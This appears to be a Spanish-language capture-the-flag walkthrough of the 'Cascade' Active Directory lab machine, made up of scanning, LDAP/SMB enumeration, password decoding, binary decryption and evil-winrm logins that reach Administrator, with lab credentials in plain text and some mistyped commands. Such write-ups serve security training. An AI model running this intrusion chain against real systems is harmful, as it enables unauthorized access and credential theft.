nmap -A -p- -oA mango 10.129.1.219 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -sC -sV -O -p- -oA mango 10.129.1.219

nmap -sU -O -p- -oA mango-udp 10.129.1.219

nikto -h 10.129.1.219:80

Pasted image 20211215142910.png

Pasted image 20211215143150.png

echo "10.129.205.71 cascade.local" | sudo tee -a /etc/hosts

Pasted image 20211215142812.png

rpcclient -U "" 10.129.205.71 -N

Pasted image 20211215145650.png

rpcclient -U "" 10.129.205.71 -N -c "enumdomusers" | grep -oP '\[.*?\]' | grep -v "0x" | tr -d '[]'

Pasted image 20211215150125.png

sudo ./rpcenum -e DUsersInfo -i 10.129.205.71

Pasted image 20211215151701.png

Se usa GetNPUsers cuando tienes usuarios pero no contraseñas (AS-REP roasting). En este caso no encontramos nada.

python3 /opt/impacket/examples/GetNPUsers.py cascade.local/ -no-pass -usersfile users

Pasted image 20211215152135.png

Corremos lo siguiente con las herramientas smbclient y smbmap:

smbmap -H 10.129.205.71

smbclient -L 10.129.205.71 -N

Pasted image 20211215152517.png

ldapsearch -x -h 10.129.205.71 -b "dc=cascade,dc=local" | grep "@cascade.local"

Pasted image 20211215154144.png

ldapsearch -x -h 10.129.205.71 -b "dc=cascade,dc=local" | grep "@cascade.local" -A 20

Pasted image 20211215160115.png

Pasted image 20211215160600.png

echo "clk0bjVldmE=" | base64 -d; echo

Pasted image 20211215160750.png

rpcclient -U "" 10.129.205.71 -N -c "queryuser r.thompson"

Pasted image 20211215161931.png

crackmapexec smb 10.129.205.71 -u 'r.thompson' -p 'rY4n5eva'

Pasted image 20211215162136.png

Parece que este usuario no tiene acceso remoto.

Pasted image 20211215162300.png

smbmap -H 10.129.205.71 -u 'r.thompson' -p 'rY4n5eva'

Pasted image 20211215163504.png

smbclient //10.129.205.71/Data -U 'r.thompson%rY4n5eva'

Pasted image 20211215163815.png

Como tenemos varios directorios, creamos un punto de montaje:

sudo mkdir /mnt/smbmounted

Pasted image 20211215165000.png

smb mount -t cifs //10.129.205.71/Data /mnt/smbmounted -o username=r.thompson,password=rY4n5eva,domain=cascade.local,rw

Pasted image 20211215165020.png

Para no estar entrando y saliendo de cada directorio con `cd ..`, `cd directorio`, etc.:

cd /mnt/submounted

tree

Pasted image 20211215165213.png

cp /mnt/smbmounted/IT/Email\ Archives/Meeting Notes June 2018.html index.html

Pasted image 20211215172340.png

Vemos lo que se encuentra en index.html. El usuario:

Pasted image 20211215173017.png

pushd /mnt/smbmounted /mnt/smbmounted ~/Desktop/boxes/cascade/content

tree

Pasted image 20211215173424.png

Pasted image 20211215173632.png

cp /mnt/smbmounted/IT/Logs/Ark\ AD\Recycle\ Bin/ArkAdRecycleBin.log .

cat ArkAdRecycleBin.log

Pasted image 20211215174812.png

Vemos el archivo "VNC Install.reg".

grep -i "Ark" users

Pasted image 20211215175024.png

file VNC Install.reg

Pasted image 20211215181559.png

Pasted image 20211215181704.png

Para convertirlo de hexadecimal a cadena (bytes):

echo "6b,cf,2a,4b,6e,5a,ca,0f" | tr -d ',' | xxd -ps -r > password

Pasted image 20211215181942.png

https://github.com/jeroennijhof/vncpwd

Pasted image 20211215182709.png

./vncpwd ../password

Pasted image 20211215182759.png

crackmapexec smb 10.129.205.71 -u ../users -p 'sT333ve2'

Pasted image 20211215182922.png

crackmapexec smb 10.129.205.71 -u 's.smith' -p 'sT333ve2'

Pasted image 20211215183031.png

evil-winrm -i 10.129.205.71 -u 's.smith' -p 'sT333ve2'

Pasted image 20211215190501.png

net user

net user s.smith

Pasted image 20211215190926.png

smbmap -H 10.129.205.71 -u 's.smith' -p 'sT333ve2'

Pasted image 20211215191408.png

cd C:\Shares\Audit

smbclient //10.129.205.71/Audit$ -U 's.smith%sT333ve2'

Pasted image 20211215191820.png

download C:\Shares\Audit\CascAudit.exe

mv C:\\Shares\\Audit\\CascAudit.exe ../CascAudit.exe

Pasted image 20211215192104.png

Para bajar todos los archivos del recurso SMB de forma recursiva:

prompt off recurse on mget *

Pasted image 20211215192257.png Pasted image 20211215192318.png

cd DB

file Audit.db

Pasted image 20211215193010.png

sqlite3 Audit.db

.tables

select * from Ldap;

Pasted image 20211215193026.png

echo "BQO5.." | base64 -d > arksvc_passwd

Pasted image 20211215193405.png

Encontramos el ejecutable CascAudit.exe.

Pasted image 20211215193520.png

Abrimos CascAudit.exe con JetBrains dotPeek.

Pasted image 20211215194434.png

Abrimos Crypto.dll con JetBrains dotPeek.

Pasted image 20211215194845.png

Nos dirigimos a CyberChef. Introducimos la clave (key) y el vector de inicialización (IV).

Pasted image 20211215195316.png

credenciales-> arksvc:w3lc0meFr31nd

Pasted image 20211215195452.png

evil-winrmm -t 10.129.205.71 -u 'arksvc' -p 'w3lc0meFr31nd'

Pasted image 20211215195535.png

whoami /priv

Pasted image 20211215195627.png

Get-ADObject -Filter 'Deleted -eq $true' -IncludeDeletedObjects -Properties *

Pasted image 20211215213123.png

echo "YmFDVDN.." | base64 -d

evil-winrmm -t 10.129.205.71 -u 'Administrator' -p 'baCT3r1aN00dles'

Pasted image 20211215213331.png

